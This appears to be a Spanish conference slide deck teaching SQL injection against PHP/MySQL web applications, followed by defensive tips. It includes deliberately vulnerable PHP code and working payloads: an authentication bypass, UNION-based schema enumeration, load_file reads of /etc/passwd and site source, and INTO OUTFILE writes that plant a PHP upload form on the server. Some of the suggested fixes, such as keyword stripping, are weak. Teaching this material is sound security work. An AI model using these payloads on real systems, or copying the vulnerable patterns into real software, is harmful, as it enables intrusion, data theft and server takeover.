Seguridad WEB: SQL INJECTION
Speaker: PUA. Juan Francisco BoscoContact:[email protected]
Blog: http://magnobalt.blogspot.com
Historia de SQL• 1970 Donald Chamberlin en los laboratorios de investigación de IBM. Este
lenguaje se llamaba SEQUEL (Structured English Query Language).
• 1977 fue rescrito y se denomino SEQUEL/2, y finalmente por motivos legales, termina convirtiéndose en SQL.
• 1986, el ANSI adoptó SQL como estándar para los lenguajes relacionales
• 1987 se transfomó en estándar ISO
• Antes de 1990: Esquema Centralizados
• Actualidad: Internet
¿SQL INJECTION?
1# TOP TEN
• Vulnerabilidad: Se radica en la capa de aplicacion.
• Error: Mal filtrado en las variables de entradas a la DB.
• Alcanze: Cualquiera puede inyectar codigo SQL que será interpretado por el DBMS, pudiendo comprometer al HOST.
ESQUEMA
Ataques a la Seguridad
Integridad: Borrado o corrupcion de dato• INSERT, DELETE, DROP.
Disponibilidad: Denegacion de Servio• Consultas pesadas, exploit.
Confidencialidad: Obtención de información sensibles.• Bypass de autenticación• Inyección con UNION• Basadas en errores• Blind SQL Injection
0x01- Bypass de Autenticacion (POST)
Codigo Vulnerable:
1.$usuario=$_POST['nombre'];2.$password=$_POST['pass'];3.$sql="SELECT * FROM usuario WHERE usuario='$usuario' AND password='$password'";4.$login=mysql_query($sql,$conexion);
Caso Normal:
SELECT * FROM usuario WHERE usuario='admin' AND password='admin123'
Caso con inyección de SQL: 'or 1=1--
SELECT * FROM usuario WHERE usuario=''or 1=1-- ' AND password='loquesea'
DEMO 1
0x02 – Ataque con UNION (GET)
Codigo Vulnerable:
1.if(isset($_GET['id']) && !empty($_GET['id'])){2.$id=$_GET['id'];3.$sql="SELECT * FROM conceptos WHERE ID =$id";4.$query=mysql_query($sql)
1) Verificando la falla:Podemos provocar distintos comportamientos en una web lo cual nos dará indicios de que la misma es vulnerable.
DEMO 1
DEMO 2
2) Contando campos:
Clausula UNION: Se usa para combinar el resultado de un número de comandos SELECT en un conjunto de resultados. Para usarlo nesesitamos la cantidad de campos que tiene el primer SELECT.
1- Con ORDER BY: La forma es ir ordenando la salida de la consulta por el número de posición de cada columna, una por una, hasta que sobrepase el limite de campos.
2- Con UNION: Consiste en poder ir colocando columnas hasta que la sentencia UNION se ejecute correctamente.
DEMOSTRACIÓN
3) Recoleccion de datos
MySQL contiene variables y funciones que otorgan informacion al usuario, donde las mismas pueden ser usadas para obtener datos importantes para el atacante.
• version()• user()• database()• @@datadir
SELECT * FROM NOTICIAS WHERE id= -1 UNION SELEC 1,version(),3
4)Information Schema
El soporte para INFORMATION_SCHEMA está disponible en MySQL 5.0.2 y posterior. Proporciona acceso a los metadatos de la base de datos. Metadatos son datos acerca de los datos, tales como el nombre de la base de datos o tabla, el tipo de datos de una columna, o permisos de acceso.
4.1)Obtener tablas mediante SCHEMA
Podemos obtener la informacion de todas las tablas en la base de dato gracias a la vista, information_schema.tables.
SELECT * FROM NOTICIAS WHERE id= -1 UNION SELEC 1,table_name,3 FROM INFORMATION_SCHEMA.TABLES
4.2) Obtener columnas mediante SCHEMA.
De la misma manera que obtuvimos las tablas podemos conocer los nombres de las columnas de una respectiva tabla
consultando la vista information.schema.columns
SELECT * FROM NOTICIAS WHERE id= -1UNION SELECT 1,column_name,3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'NAMETABLA'
0x03 Inyecciones SQL que Comprometen al Host
Si el usuario que esta ejecutando las consultas SQL tiene el permiso de FILE, podemos dar uso de las clausulas LOAD_FILE e INTO OUTFILE.
1) LOAD_FILE
Nos permite leer un archivo, y obtenerlo como una cadena.
SELECT * FROM NOTICIAS WHERE id= -1UNION SELECT 1,load_file('/etc/passwd'),3
Probocando lo que se conoce como PATH DISCLOSURE, obtenemos el DocumentRoot de la web, para poder leer los archivos PHP.
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/magno/www/joinea/index.php on line 49
Fabricamos la inyección:
SELECT * FROM NOTICIAS WHERE id= -1UNION SELECT 1,load_file('/home/magno/www/joinea/index.php'),3
2) INTO OUTFILE
Esta clausula permite volcar el contenido de una tabla, a un archivo. Para poder usarla con exito en una inyección nesesitaremos, permiso de escritura en algun directorio del DocumentRoot, y las magic_quotes= off.
El codigo subido debe ser pasado a Hexadecimal:
0x484f4c41204a4f494e45412032303130: HOLA JOIENA 2010
Fabricamos la inyección:
SELECT * FROM NOTICIAS WHERE id= -1 UNION SELECT null,0x484f4c41204a4f494e45412032303130,null INTO OUTFILE '/home/magno/www/joinea/imagenes/joinea.txt'
Subiendo un Upload en PHP:
<html><form enctype="multipart/form-data" action="" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></html><?php $target_path = ""; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(isset($_FILES['uploadedfile']['name'])){if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {echo "El Archivo ". basename( $_FILES['uploadedfile']['name']). "Ha sido Subido :)";} else{echo "Hubo un error, intentar otra vez!!";}}?>
0x04 SQLi en CMS:1#
2#
0x04 Las soluciones: Tips
1. Addslashes()
$usuario=addslashes($_POST['nombre']);
$usuario='or 1=1 # output: \' or 1=1
Similar: mysql_real_escape_string()
2. Magic_quotes: Habilitar en la configuracion de PHP (php.ini) al valor On. Esta caracteristica es despreciable a partir de PHP 5.3.0 y sera removido en la version 6.0.
3. int()
$id=(int)$_GET['id'];
4. is_numeric()
if (is_numeric($_GET['id']){ echo “Es un entero”;}
5. str_replace()
$cadena = str_replace ("'", "", $cadena);$cadena = str_replace ("UNION", "", $cadena);$cadena = str_replace ("OR", "", $cadena);
6. Prepared Statements:
$mysqli = new mysqli('localhost', 'user', 'pass', 'db');$stmt= $mysqli ->prepare("SELECT usuario FROM usuarios WHERE usuario=?");$stmt->bind_param('s', $usuario);$stmt->execute();
7. Seguir el principio de mínimo privilegio en las conexiones con bases de datos.
8. El filtrado debé realizarse en el servidor en ultima instancia (no confiar en JavaScript, Flash etc).
9. No dar información detallada sobre los errores▪ “Contraseña incorrecta para el usuario usuario”.▪ “Error al conectar a la base de datos midb“.
Muchas Gracias por su atención!
EOF
Top Related